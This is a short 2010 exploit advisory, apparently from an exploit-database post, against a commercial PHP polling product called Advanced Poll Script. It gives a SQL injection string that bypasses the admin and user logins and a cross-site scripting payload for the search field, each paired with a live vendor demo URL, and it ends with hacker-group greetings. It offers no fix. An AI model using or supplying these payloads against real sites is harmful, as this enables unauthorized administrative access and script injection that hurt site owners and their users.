# Exploit Title: XSS and Authentication bypass in Advanced Poll Script # Date: 26-apr-2010 # Author: Sid3^effects # Software Link: N/a # CVE : [] # Code : [] ______________________________________________________________________________ XSS and Authentication bypass in Advanced Poll Script Vendor:http://www.2daybiz.com/ ___________________________Author:Sid3^effects_________________________________ Description : Advanced Poll is a polling system with powerful administration tool supports both text file and MySQL database. Its features include multiple polls, unlimited options, IP-Logging, IP-Locking, cookie support, comment feature, vote expire feature, and random poll support. script cost :$140 --------------------------------------------------------------------------- * Authentication bypass: The following script has authentication bypass in the admin login as well as in user login use ' or 1=1 or ''=' in both login and password. user login demo :http://www.2daybiz.com/products/polls/login.php admin login demo: http://www.2daybiz.com/products/polls/admin/ --------------------------------------------------------------------------- * XSS (cross site scripting ) : XSS is also found in the search field. Attack Pattern: '"--><script>alert(0x000872)</script> DEMO:http://www.2daybiz.com/products/polls/index_search.php?category= [XSS] --------------------------------------------------------------------------- ShoutZ : ------- ---Indian Cyber warriors--Andhra hackers-- Greetz : -------- ---*L0rd rusAd&#234;r*---d4rk-blu&#65533;reg; [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--MayUr--